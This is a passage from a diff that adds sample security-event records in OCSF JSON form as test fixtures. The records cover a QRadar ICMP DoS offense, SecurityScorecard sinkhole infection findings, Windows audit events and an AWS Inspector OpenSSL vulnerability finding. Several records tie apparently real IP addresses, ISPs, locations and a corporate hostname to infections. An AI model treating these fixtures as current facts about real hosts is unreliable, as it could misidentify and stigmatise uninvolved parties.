-ISC- ICMP blind TCP reset DoS guessing attempt\n", + "first_seen_time": 1682347463000, + "last_seen_time": 1682781010000 + }, + "confidence_score": 2, + "confidence": "Low", + "confidence_id": 2, + "data_sources": [ + 
"Snort @ wolverine" + ], + "impact_score": 0, + "impact": "Low", + "impact_id": 1, + "malware": [ + { + "classification_ids": [ + 5 + ], + "classifications": [ + "DDOS" + ], + "name": "ICMP DoS" + } + ], + "risk_level": "High", + "risk_level_id": 3, + "risk_score": 3, + "state": "In Progress", + "state_id": 2, + "activity_id": 1, + "category_uid": 2, + "class_uid": 2001, + "time": 1682347463218, + "message": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt\n", + "metadata": { + "log_name": "Offense", + "log_provider": "IBM QRadar", + "original_time": 1682347463218, + "product": { + "lang": "en", + "name": "QRadar SIEM", + "version": "7.5.0", + "vendor_name": "IBM" + }, + "version": "7.5.0", + "modified_time": 1682347469220 + }, + "activity_name": "Create", + "category_name": "Findings", + "class_name": "Security Finding", + "count": 2, + "end_time": 1682781010000, + "enrichments": [ + { + "name": "Magnitude", + "provider": "Event Processor", + "type": "score", + "value": "3" + }, + { + "name": "offense_type", + "provider": "Event Processor", + "type": "correlation", + "value": "2" + }, + { + "name": "offense_source", + "provider": "Event Processor", + "type": "correlation", + "value": "BLEEDING-EDGE DOS -ISC- ICMP blind TCP reset DoS guessing attempt" + }, + { + "name": "category_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "device_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "event_count", + "provider": "Event Processor", + "type": "counter", + "value": "2" + }, + { + "name": "flow_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "policy_category_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "remote_destination_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "local_destination_count", + "provider": 
"Event Processor", + "type": "counter", + "value": "2" + }, + { + "name": "security_category_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "source_count", + "provider": "Event Processor", + "type": "counter", + "value": "1" + }, + { + "name": "user_name_count", + "provider": "Event Processor", + "type": "counter", + "value": "0" + }, + { + "name": "domain_id", + "provider": "Event Processor", + "type": "correlation", + "value": "0" + }, + { + "name": "source_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-99-99-99.Net_99_0_0_0" + }, + { + "name": "destination_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-88-88-88.Net_88_88_0_0" + }, + { + "name": "destination_network", + "provider": "Event Processor", + "type": "network", + "value": "Net-77-77-77.Net_77_0_0_0" + } + ], + "observables": [ + { + "name": "log_source_id", + "type": "Other", + "type_id": 99, + "value": "112" + }, + { + "name": "log_source_name", + "type": "Other", + "type_id": 99, + "value": "Snort @ wolverine" + }, + { + "name": "log_source_type_id", + "type": "Other", + "type_id": 99, + "value": "2" + }, + { + "name": "log_source_type_name", + "type": "Other", + "type_id": 99, + "value": "Snort" + }, + { + "name": "assigned_to", + "type": "User", + "type_id": 21, + "value": "SomeUser" + }, + { + "name": "low_level_category", + "type": "Other", + "type_id": 99, + "value": "ICMP DoS" + }, + { + "name": "source_address", + "type": "IP Address", + "type_id": 2, + "value": "99.99.99.99" + }, + { + "name": "local_destination_address", + "type": "IP Address", + "type_id": 2, + "value": "88.88.88.88" + }, + { + "name": "local_destination_address", + "type": "IP Address", + "type_id": 2, + "value": "77.77.77.77" + } + ], + "status_code": "OPEN" + } + ``` + + + +=== "test_security_finding_3" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + 
"classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.openinternet", + "provider": "SecurityScorecard", + "uid": "pva.torrent.openinternet_9d153be3-a48e-4498-b476-18c2a847d214" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"-\",\"enc_host\":\"open-internet.nl\",\"enc_raw_header\":\"-\",\"enc_request\":\"SOCKET_UDP%20%2F\",\"enc_request_body\":\"AAAEFycQGYAAAAAAiWPgag==\",\"family\":\"pva.torrent.openinternet\",\"field_1\":\"2022-06-27T01:37:06.385325 version_5\",\"remote_addr\":\"1.183.190.110\",\"remote_port\":\"2048\",\"remote_user\":\"-\", \"status\":\"200\",\"time_local\":\"2022-06-27T01:36:21.515207\"}", + "message": "Potentially vulnerable application infection detected on IP address 1.183.190.110 by Malware DNS sinkhole on communication domain for sinkholed domain open-internet.nl", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199945, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199945, + "original_time": "2022-11-15T17:59:59.945Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 1.183.190.110 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection 
logs", + "owner": "chinatelecom.cn", + "uid": "1.183.190.110" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "1.183.190.110" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "open-internet.nl" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.openinternet" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "2048" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Bieligutai, China" + } + ], + "finding": { + "title": "Infection found on 1.183.190.110", + "uid": "2b7908d7-4b72-4f65-afa0-09bdaea46ae3", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.openinternet" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/1.183.190.110", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199945, + "desc": "Potentially vulnerable application infection detected on IP address 1.183.190.110 communicating with Command-and-Control domain open-internet.nl" + } + } + ``` + + + +=== 
"test_security_finding_4" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.openinternet", + "provider": "SecurityScorecard", + "uid": "pva.torrent.openinternet_e1472f25-0d2d-4b88-aac9-b7bd439218f5" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"-\",\"enc_host\":\"open-internet.nl\",\"enc_raw_header\":\"-\",\"enc_request\":\"SOCKET_UDP%20%2F\",\"enc_request_body\":\"AAAEFycQGYAAAAAAtdIQjw==\",\"family\":\"pva.torrent.openinternet\",\"field_1\":\"2022-06-04T10:35:07.143255 version_5\",\"remote_addr\":\"59.11.81.231\",\"remote_port\":\"6927\",\"remote_user\":\"-\", \"status\":\"200\",\"time_local\":\"2022-06-04T10:34:45.835005\"}", + "message": "Potentially vulnerable application infection detected on IP address 59.11.81.231 by Malware DNS sinkhole on communication domain for sinkholed domain ", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199946, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199946, + "original_time": "2022-11-15T17:59:59.946Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 59.11.81.231 of 
device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "krnic.or.kr", + "uid": "59.11.81.231" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "59.11.81.231" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": null + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.openinternet" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "6927" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Seongnam-si (Buljeong-ro), Korea, Republic of" + } + ], + "finding": { + "title": "Infection found on 59.11.81.231", + "uid": "45521c66-6498-442d-ad9b-40da9f0e9236", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.openinternet" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/59.11.81.231", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199947, + "desc": "Potentially vulnerable application infection detected on IP 
address 59.11.81.231 communicating with Command-and-Control domain " + } + } + ``` + + + +=== "test_security_finding_5" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Potentially vulnerable application" + ], + "name": "pva.torrent.kickasstracker", + "provider": "SecurityScorecard", + "uid": "pva.torrent.kickasstracker_d605642d-9f8b-46ed-bb19-882ffc34a8f4" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": "{\"body_bytes_sent\":\"152\",\"enc_host\":\"open.kickasstracker.com\",\"enc_raw_header\":\"R0VUIC9zY3JhcGU/aW5mb19oYXNoPSUwMiUyNSVkYiVmMiVmZlElZWVLJTNmJWMxJTI4MW8lMGMlMDklYWElODN4JWVlJTk5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBUcmFuc21pc3Npb24vMi44NA0KSG9zdDogb3Blbi5raWNrYXNzdHJhY2tlci5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXA7cT0xLjAsIGRlZmxhdGUsIGlkZW50aXR5DQoNCg==\",\"enc_request\":\"GET%20%2Fscrape%3Finfo_hash%3D%2502%2525%25db%25f2%25ffQ%25eeK%253f%25c1%25281o%250c%2509%25aa%2583x%25ee%2599%20HTTP%2F1.1\",\"enc_request_body\":\"\",\"family\":\"pva.torrent.kickasstracker\",\"field_1\":\"2022-09-30T21:26:09.028507 version_5\",\"remote_addr\":\"190.109.227.80\",\"remote_port\":\"21886\",\"remote_user\":\"-\", \"status\":\"404\",\"time_local\":\"2022-09-30T21:25:21+00:00\"}", + "message": "Potentially vulnerable application infection detected on IP address 190.109.227.80 by Malware DNS sinkhole on communication domain for sinkholed domain open.kickasstracker.com", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199947, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199947, + "original_time": 
"2022-11-15T17:59:59.947Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 190.109.227.80 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "cotel.bo", + "uid": "190.109.227.80" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "190.109.227.80" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Potentially vulnerable application" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "open.kickasstracker.com" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "pva.torrent.kickasstracker" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "21886" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "La Paz (Macrodistrito Centro), Bolivia, Plurinational State of" + } + ], + "finding": { + "title": "Infection found on 190.109.227.80", + "uid": "8f91e92d-b75c-4d55-a6a2-c9f611cdea28", + "types": [ + "malware_infection", + "infected_device", + "pva.torrent.kickasstracker" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/190.109.227.80", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this 
event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + "https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199948, + "desc": "Potentially vulnerable application infection detected on IP address 190.109.227.80 communicating with Command-and-Control domain open.kickasstracker.com" + } + } + ``` + + + +=== "test_security_finding_6" + + + ```json + { + "activity_id": 1, + "malware": [ + { + "classification_ids": [ + -1 + ], + "classifications": [ + "Adware" + ], + "name": "adware.android.imp", + "provider": "SecurityScorecard", + "uid": "adware.android.imp_7cd5cf7b-4c99-406c-ad46-621487394fba" + } + ], + "activity_name": "Generate", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Security Finding", + "class_uid": 2001, + "confidence": 100, + "data": 
"{\"body_bytes_sent\":\"152\",\"enc_host\":\"x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com\",\"enc_raw_header\":\"UE9TVCAvYXVjdGlvbi9pbml0IEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtcHJvdG9idWYNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29udGVudC1FbmNvZGluZzogZ3ppcA0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgU00tQTIwN0YgQnVpbGQvUlAxQS4yMDA3MjAuMDEyKQ0KSG9zdDogeC1ldS41OGRhYzE2ZTdiMmM4NmMxOWNmZTQ4OTE0YTZlOGZjZGFjOWFlMDZmZTVjZjUzMzY5YmVhYTQ1Yi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzMDMNCg0K\",\"enc_request\":\"POST%20%2Fauction%2Finit%20HTTP%2F1.1\",\"enc_request_body\":\"H4sIAAAAAAAAAK3PzUoDMRQFYEhbSwNSnI1lljKrgYQkzd+47MqNIIg/u3qTTHCUzshMacFHEHwGwbUPaStVQTcu3F3uOXxwcI8X02TsmwWFdUehDm1ThQk6QpznvZs3JPCsCqfgb6u6PB5wWlA9y0oLzjGvCHPGE+kgEif05iq5YVZZkEye9M+Qy6LVLETpiXfOEilAE2sUJ9EIr4WCGKfibqSoVJQRrttMhKijLhjxQhsijSo29NSS4IOSDJRRzDy+IvyC8H5dLtdNe9/Nqzo2yTMSTwhf55c4wcNdlAzTwaKFKuAUj3e/+apsu6qptxnb7LE4w4efGQR4WJbtV2eUDj82U46v8gt88C3vpf0VdMt/gC/y8x9wvYUnv+FB2uOU/Y19BzRbkezaAQAA\",\"family\":\"adware.android.imp\",\"field_1\":\"2022-09-23T16:20:10.540428 version_5\",\"remote_addr\":\"38.7.186.198\",\"remote_port\":\"59750\",\"remote_user\":\"-\",\"status\":\"404\",\"time_local\":\"2022-09-23T16:19:38+00:00\"}", + "message": "Adware infection detected on IP address 38.7.186.198 by Malware DNS sinkhole on communication domain for sinkholed domain x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com", + "severity": "Informational ", + "severity_id": 1, + "status": "Not applicable, static security finding from global threat intelligence monitoring", + "status_id": -1, + "state": "New", + "state_id": 1, + "time": 1668535199948, + "timezone_offset": 0, + "type_name": "Security Finding: Generate", + "type_uid": 200101, + "metadata": { + "logged_time": 1668535199948, + "original_time": "2022-11-15T17:59:59.948Z", + "labels": [ + "infected_device" + ], + "product": { + "lang": "en", + "name": "SecurityScorecard 
Attack Surface Intelligence", + "uid": "ssc_asi", + "feature": { + "uid": "ssc_malware_dns_sinkhole", + "name": "SecurityScorecard Malware DNS Sinkhole collection system" + }, + "vendor_name": "SecurityScorecard" + }, + "version": "1.0.0", + "profiles": [ + "malware", + "reputation" + ] + }, + "resources": [ + { + "group_name": "infected_device", + "name": "IPv4 address 38.7.186.198 of device in SecurityScorecard DNS sinkhole malware, adware, or potentially unwanted/vulnerable collection logs", + "owner": "emix.net.ae", + "uid": "38.7.186.198" + } + ], + "observables": [ + { + "name": "infected_device.ip", + "type": "IP Address", + "type_id": 2, + "value": "38.7.186.198" + }, + { + "name": "infection.category", + "type": "Category of infection on infected device", + "type_id": -1, + "value": "Adware" + }, + { + "name": "infected_device.malware_hostname", + "type": "Hostname", + "type_id": 1, + "value": "x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com" + }, + { + "name": "infection.family", + "type": "Malware, adware, or PUA/PVA family name", + "type_id": -1, + "value": "adware.android.imp" + }, + { + "name": "infected_device.source_port", + "type": "Client-side port making connection to the infection communication domain", + "type_id": -1, + "value": "59750" + }, + { + "name": "infected_device.geo_location", + "type": "Geo Location", + "type_id": 26, + "value": "Karachi (Sector Five F), Pakistan" + } + ], + "finding": { + "title": "Infection found on 38.7.186.198", + "uid": "26c7c83d-0aad-411b-88ee-52343ff22064", + "types": [ + "malware_infection", + "infected_device", + "adware.android.imp" + ], + "src_url": "https://platform.securityscorecard.io/#/asi/details/38.7.186.198", + "remediation": { + "desc": "If this IP address is tied to your network via any observables attached to this event, take immediate steps to find the related device on your network and remove the infection seen from external threat intelligence", + "kb_articles": [ + 
"https://support.securityscorecard.com/hc/en-us/articles/8528362400539-How-SecurityScorecard-collects-data-for-ASI#h_01GBX38RBVVDT63RH11KVREN0K", + "https://support.securityscorecard.com/hc/en-us/articles/360061410291-Resolving-Malware-Findings" + ] + }, + "product_uid": "ssc_malware_dns_sinkhole", + "last_seen_time": 1668535199948, + "desc": "Adware infection detected on IP address 38.7.186.198 communicating with Command-and-Control domain x-eu.58dac16e7b2c86c19cfe48914a6e8fcdac9ae06fe5cf53369beaa45b.com" + } + } + ``` + + + +=== "test_system_activity_1" + + + ```json + { + "activity_id": 99, + "actor": { + "process": { + "file": { + "name": "lsass.exe", + "parent_folder": "C:\\Windows\\System32", + "path": "C:\\Windows\\System32\\lsass.exe", + "type_id": 1 + }, + "pid": 492 + }, + "session": { + "uid": "0x3e7" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "DIR", + "name": "STLDIRDC1$", + "uid": "NT AUTHORITY\\SYSTEM" + } + }, + "category_uid": 1, + "class_uid": 1010, + "device": { + "hostname": "STLDIRDC1.dir.solutia.com", + "os": { + "name": "Windows", + "type_id": 100 + }, + "type_id": 0 + }, + "message": "A handle to an object was requested.", + "metadata": { + "original_time": "01/09/2019 12:46:00 AM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + "vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "d9e6a7b1-3177-4542-8de1-bfd582f87727", + "version": "1.0.0-rc.2" + }, + "severity_id": 1, + "status_id": 1, + "time": 1547012760000, + "unmapped": { + "Access Request Information": { + "Access Mask": "0x2d", + "Accesses": [ + "DELETE", + "READ_CONTROL", + "WRITE_DAC", + "WRITE_OWNER", + "ReadPasswordParameters", + "WritePasswordParameters", + "ReadOtherParameters", + "WriteOtherParameters", + "CreateUser", + "CreateGlobalGroup", + "CreateLocalGroup", + "GetLocalGroupMembership", + "ListAccounts" + ], + "Privileges Used for Access Check": "\u01ff\\x0F-", + 
"Properties": [ + "---", + "domain", + "DELETE", + "READ_CONTROL", + "WRITE_DAC", + "WRITE_OWNER", + "ReadPasswordParameters", + "WritePasswordParameters", + "ReadOtherParameters", + "WriteOtherParameters", + "CreateUser", + "CreateGlobalGroup", + "CreateLocalGroup", + "GetLocalGroupMembership", + "ListAccounts", + "Domain Password & Lockout Policies", + "lockOutObservationWindow", + "lockoutDuration", + "lockoutThreshold", + "maxPwdAge", + "minPwdAge", + "minPwdLength", + "pwdHistoryLength", + "pwdProperties", + "Other Domain Parameters (for use by SAM)", + "serverState", + "serverRole", + "modifiedCount", + "uASCompat", + "forceLogoff", + "domainReplica", + "oEMInformation", + "Domain Administer Server" + ], + "Restricted SID Count": "0", + "Transaction ID": "{00000000-0000-0000-0000-000000000000}" + }, + "EventCode": "4661", + "EventType": "0", + "Object": { + "Object Server": "Security Account Manager" + }, + "OpCode": "Info", + "RecordNumber": "3166250565", + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "SAM" + }, + "win_resource": { + "name": "DC=dir,DC=solutia,DC=com", + "type_id": 36, + "uid": "0x7f79620" + } + } + ``` + + + +=== "test_system_activity_2" + + + ```json + { + "activity_id": 1, + "actor": { + "process": { + "file": { + "name": "explorer.exe", + "parent_folder": "C:\\Windows", + "path": "C:\\Windows\\explorer.exe", + "type_id": 1 + }, + "pid": 1704 + }, + "session": { + "uid": "0xDE9AD8" + }, + "user": { + "account_type": "Windows Account", + "account_type_id": 2, + "domain": "SESTEST", + "name": "splunker", + "uid": "SESTEST\\splunker" + } + }, + "category_uid": 1, + "class_uid": 1010, + "device": { + "hostname": "SesWin2019DC1.SesTest.local", + "os": { + "name": "Windows", + "type_id": 100 + }, + "type_id": 0 + }, + "message": "A privileged service was called.", + "metadata": { + "original_time": "01/28/2022 04:12:19 PM", + "product": { + "feature": { + "name": "Security" + }, + "name": "Microsoft Windows", + 
"vendor_name": "Microsoft" + }, + "profiles": [ + "host" + ], + "uid": "995559a6-1921-463f-93e1-9c5ca932dc8c", + "version": "1.0.0-rc.2" + }, + "severity_id": 1, + "status_id": 2, + "time": 1643404339000, + "unmapped": { + "EventCode": "4673", + "EventType": "0", + "OpCode": "Info", + "RecordNumber": "374060", + "Service Request Information": { + "Privileges": "SeTcbPrivilege" + }, + "SourceName": "Microsoft Windows security auditing.", + "TaskCategory": "Sensitive Privilege Use" + }, + "win_resource": { + "name": "-", + "type": "Security", + "type_id": 0 + } + } + ``` + + + +=== "test_vulnerability_finding_1" + + + ```json + { + "activity_id": 2, + "activity_name": "Update", + "category_name": "Findings", + "category_uid": 2, + "class_name": "Vulnerability Finding", + "class_uid": 2002, + "cloud": { + "account": { + "uid": "111111111111" + }, + "provider": "AWS", + "region": "us-east-2" + }, + "finding_info": { + "created_time_dt": "2023-04-21T11:59:04.000-04:00", + "desc": "Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARM\nplatform contains a bug that could cause it to read past the input buffer,\nleading to a crash.\n\nImpact summary: Applications that use the AES-XTS algorithm on the 64 bit ARM\nplatform can crash in rare circumstances. The AES-XTS algorithm is usually\nused for disk encryption.\n\nThe AES-XTS cipher decryption implementation for 64 bit ARM platform will read\npast the end of the ciphertext buffer if the ciphertext size is 4 mod 5 in 16\nbyte blocks, e.g. 144 bytes or 1024 bytes. If the memory after the ciphertext\nbuffer is unmapped, this will trigger a crash which results in a denial of\nservice.\n\nIf an attacker can control the size and location of the ciphertext buffer\nbeing decrypted by an application using AES-XTS on 64 bit ARM, the\napplication is affected. 
This is fairly unlikely making this issue\na Low severity one.", + "first_seen_time_dt": "2023-04-21T11:59:04.000-04:00", + "last_seen_time_dt": "2024-01-26T17:19:14.000-05:00", + "modified_time_dt": "2024-01-26T17:19:14.000-05:00", + "title": "CVE-2023-1255 - openssl", + "types": [ + "Software and Configuration Checks/Vulnerabilities/CVE" + ], + "uid": "arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5" + }, + "metadata": { + "log_version": "2018-10-08", + "processed_time_dt": "2024-01-26T17:59:56.923-05:00", + "product": { + "feature": { + "uid": "AWSInspector" + }, + "name": "Inspector", + "uid": "arn:aws:securityhub:us-east-2::product/aws/inspector", + "vendor_name": "Amazon", + "version": "2" + }, + "profiles": [ + "cloud", + "datetime" + ], + "version": "1.1.0" + }, + "observables": [ + { + "name": "resource.uid", + "type": "Resource UID", + "type_id": 10, + "value": "arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8" + } + ], + "resource": { + "cloud_partition": "aws", + "data": "{\"AwsEcrContainerImage\":{\"Architecture\":\"amd64\",\"ImageDigest\":\"sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\",\"ImagePublishedAt\":\"2023-04-11T21:07:55Z\",\"RegistryId\":\"111111111111\",\"RepositoryName\":\"browserhostingstack-EXAMPLE-btb1o54yh1jr\"}}", + "region": "us-east-2", + "type": "AwsEcrContainerImage", + "uid": "arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8" + }, + "severity": "Medium", + "severity_id": 3, + "status": "New", + "time": 1706307554000, + "time_dt": "2024-01-26T17:19:14.000-05:00", + "type_name": "Vulnerability Finding: Update", + "type_uid": 200202, + "unmapped": { + "FindingProviderFields.Severity.Label": "MEDIUM", + "FindingProviderFields.Types[]": "Software and 
Configuration Checks/Vulnerabilities/CVE", + "ProductFields.aws/inspector/FindingStatus": "ACTIVE", + "ProductFields.aws/inspector/inspectorScore": "5.9", + "ProductFields.aws/inspector/packageVulnerabilityDetails/vulnerablePackages/sourceLayerHashes": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09", + "ProductFields.aws/inspector/resources/1/resourceDetails/awsEcrContainerImageDetails/platform": "ALPINE_LINUX_3_17", + "ProductFields.aws/securityhub/CompanyName": "Amazon", + "ProductFields.aws/securityhub/FindingId": "arn:aws:securityhub:us-east-2::product/aws/inspector/arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5", + "ProductFields.aws/securityhub/ProductName": "Inspector", + "RecordState": "ACTIVE", + "Severity.Normalized": "40", + "Vulnerabilities[].Cvss[].Source": "NVD,NVD", + "Vulnerabilities[].Vendor.VendorSeverity": "MEDIUM", + "Vulnerabilities[].VulnerablePackages[].SourceLayerHash": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09", + "WorkflowState": "NEW" + }, + "vulnerabilities": [ + { + "affected_packages": [ + { + "architecture": "X86_64", + "epoch": 0, + "fixed_in_version": "0:3.0.8-r4", + "name": "openssl", + "package_manager": "OS", + "release": "r3", + "remediation": { + "desc": "apk update && apk upgrade openssl" + }, + "version": "3.0.8" + } + ], + "cve": { + "created_time_dt": "2023-04-20T13:15:06.000-04:00", + "cvss": [ + { + "base_score": 5.9, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + }, + { + "base_score": 5.9, + "vector_string": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "version": "3.1" + } + ], + "epss": { + "score": "0.00066" + }, + "modified_time_dt": "2023-09-08T13:15:15.000-04:00", + "references": [ + "https://nvd.nist.gov/vuln/detail/CVE-2023-1255" + ], + "uid": "CVE-2023-1255" + }, + "is_exploit_available": true, + "is_fix_available": true, + "references": [ + 
